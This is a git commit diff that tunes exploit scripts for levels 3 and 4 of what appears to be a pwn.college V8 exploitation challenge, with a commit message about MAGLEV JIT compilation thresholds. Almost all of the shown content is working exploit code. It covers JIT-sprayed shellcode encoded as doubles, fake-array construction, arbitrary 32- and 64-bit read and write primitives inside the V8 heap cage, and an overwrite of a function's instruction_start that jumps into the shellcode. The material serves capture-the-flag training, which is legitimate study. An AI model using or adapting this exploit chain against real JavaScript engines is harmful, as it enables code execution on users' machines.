Minor Changes to Level 3 & 4 of PwnCollegeV8Exploitation
1. The threshold to trigger MAGLEV compilation is different when gdb is attached to d8 or not.
- When gdb attached to d8, the training loop count to trigger MAGLEV is 100,000.
- But when the standalone d8 running, the training loop count to trigger MAGLEV is only 10,000. If you still use 100,000, it will trigger TURBOFAN then code data structure will change and shellcode execution fails.
2. Fixed other miscellaneous minor mistakes.
This commit is contained in:
Jack Ren
@@ -36,7 +36,7 @@ function shellcode() { // Promote to ensure not GC during training
|
||||
// JIT spray machine code form of `execve("catflag", NULL, NULL)`
|
||||
return [1.9995716422075807e-246, 1.9710255944286777e-246, 1.97118242283721e-246, 1.971136949489835e-246, 1.9711826272869888e-246, 1.9711829003383248e-246, -9.254983612527998e+61];
|
||||
}
|
||||
for (let i = 0; i < 100000; i++) shellcode(); // Trigger MAGLEV compilation
|
||||
for (let i = 0; i < 10000; i++) shellcode(); // Trigger MAGLEV compilation
|
||||
|
||||
// Create a PACKED_DOUBLE_ELEMENTS array contains faked PACKED_DOUBLE_ELEMENTS array
|
||||
// map, properties, elements, length --- first three field are static roots
|
||||
@@ -64,7 +64,7 @@ function ArbWrite64(cage_addr, value) { // int32, bigint
|
||||
arr[1] = c2f(ptr(cage_addr - 0x8), 0x00008000);
|
||||
let written = b2f(value);
|
||||
fakearr[0] = written;
|
||||
console.log(`ArbWrite64 ${cage_addr.toString(16)}: ${written.toString(16)}`);
|
||||
console.log(`ArbWrite64 ${cage_addr.toString(16)}: ${value.toString(16)}`);
|
||||
}
|
||||
|
||||
// ArbRead64(0xfffffff0);
|
||||
@@ -74,16 +74,17 @@ function ArbWrite64(cage_addr, value) { // int32, bigint
|
||||
function ArbRead32(cage_addr) { // int32 -> int32
|
||||
if (cage_addr & 0x3) throw new Error("Must DWORD Aligned");
|
||||
bi64a[0] = ArbRead64(cage_addr & 0xfffffff8);
|
||||
let result = si32a[(cage_addr & 0x4) >> 2];
|
||||
let result = i32a[(cage_addr & 0x4) >> 2];
|
||||
console.log(`ArbRead32 ${cage_addr.toString(16)}: ${result.toString(16)}`);
|
||||
return result;
|
||||
}
|
||||
|
||||
// DWORD Aligned
|
||||
function ArbWrite32(cage_addr, value) { // int32, int32 -> void
|
||||
if (cage_addr & 0x3) throw new Error("Must DWORD Aligned");
|
||||
let QWORD_Aligned_cage_addr = cage_addr & 0xfffffff8;
|
||||
bi64a[0] = ArbRead64(QWORD_Aligned_cage_addr);
|
||||
si32a[(cage_addr & 0x4) >> 2] = value;
|
||||
i32a[(cage_addr & 0x4) >> 2] = value;
|
||||
ArbWrite64(QWORD_Aligned_cage_addr, bi64a[0]);
|
||||
console.log(`ArbWrite32 ${cage_addr.toString(16)}: ${value.toString(16)}`);
|
||||
}
|
||||
@@ -101,5 +102,3 @@ let instruction_start = ArbRead32(instruction_start_addr);
|
||||
console.log("instruction_start: " + instruction_start.toString(16));
|
||||
ArbWrite32(instruction_start_addr, instruction_start + 0x6B);
|
||||
shellcode();
|
||||
|
||||
// Due to heap fengshui, the possibility of getting flag by running exploit once is 1/10
|
||||
@@ -35,7 +35,7 @@ function shellcode() { // Promote to ensure not GC during training
|
||||
// JIT spray machine code form of `execve("catflag", NULL, NULL)`
|
||||
return [1.9995716422075807e-246, 1.9710255944286777e-246, 1.97118242283721e-246, 1.971136949489835e-246, 1.9711826272869888e-246, 1.9711829003383248e-246, -9.254983612527998e+61];
|
||||
}
|
||||
for (let i = 0; i < 100000; i++) shellcode(); // Trigger MAGLEV compilation
|
||||
for (let i = 0; i < 10000; i++) shellcode(); // Trigger MAGLEV compilation
|
||||
|
||||
let placeholder = {};
|
||||
let corrupt_arr = [2.30234590962020889586281057477E-320];
|
||||
@@ -85,23 +85,24 @@ function ArbWrite64(cage_addr, value) { // int32, bigint
|
||||
corrupt_arr[corrupt_arr_0_to_double_arr_element_offset] = c2f(ptr(cage_addr - 0x8), 0x00000002);
|
||||
let written = b2f(value);
|
||||
double_arr[0] = written;
|
||||
console.log(`ArbWrite64 ${cage_addr.toString(16)}: ${written.toString(16)}`);
|
||||
console.log(`ArbWrite64 ${cage_addr.toString(16)}: ${value.toString(16)}`);
|
||||
}
|
||||
|
||||
// DWORD Aligned
|
||||
function ArbRead32(cage_addr) { // int32 -> int32
|
||||
if (cage_addr & 0x3) throw new Error("Must DWORD Aligned");
|
||||
bi64a[0] = ArbRead64(cage_addr & 0xfffffff8);
|
||||
let result = si32a[(cage_addr & 0x4) >> 2];
|
||||
let result = i32a[(cage_addr & 0x4) >> 2];
|
||||
console.log(`ArbRead32 ${cage_addr.toString(16)}: ${result.toString(16)}`);
|
||||
return result;
|
||||
}
|
||||
|
||||
// DWORD Aligned
|
||||
function ArbWrite32(cage_addr, value) { // int32, int32 -> void
|
||||
if (cage_addr & 0x3) throw new Error("Must DWORD Aligned");
|
||||
let QWORD_Aligned_cage_addr = cage_addr & 0xfffffff8;
|
||||
bi64a[0] = ArbRead64(QWORD_Aligned_cage_addr);
|
||||
si32a[(cage_addr & 0x4) >> 2] = value;
|
||||
i32a[(cage_addr & 0x4) >> 2] = value;
|
||||
ArbWrite64(QWORD_Aligned_cage_addr, bi64a[0]);
|
||||
console.log(`ArbWrite32 ${cage_addr.toString(16)}: ${value.toString(16)}`);
|
||||
}
|
||||
@@ -115,5 +116,3 @@ let instruction_start = ArbRead32(instruction_start_addr);
|
||||
console.log("instruction_start: " + instruction_start.toString(16));
|
||||
ArbWrite32(instruction_start_addr, instruction_start + 0x6B);
|
||||
shellcode();
|
||||
|
||||
// the possibility of getting flag by running exploit once is 1/10
|
||||
Reference in New Issue
Block a user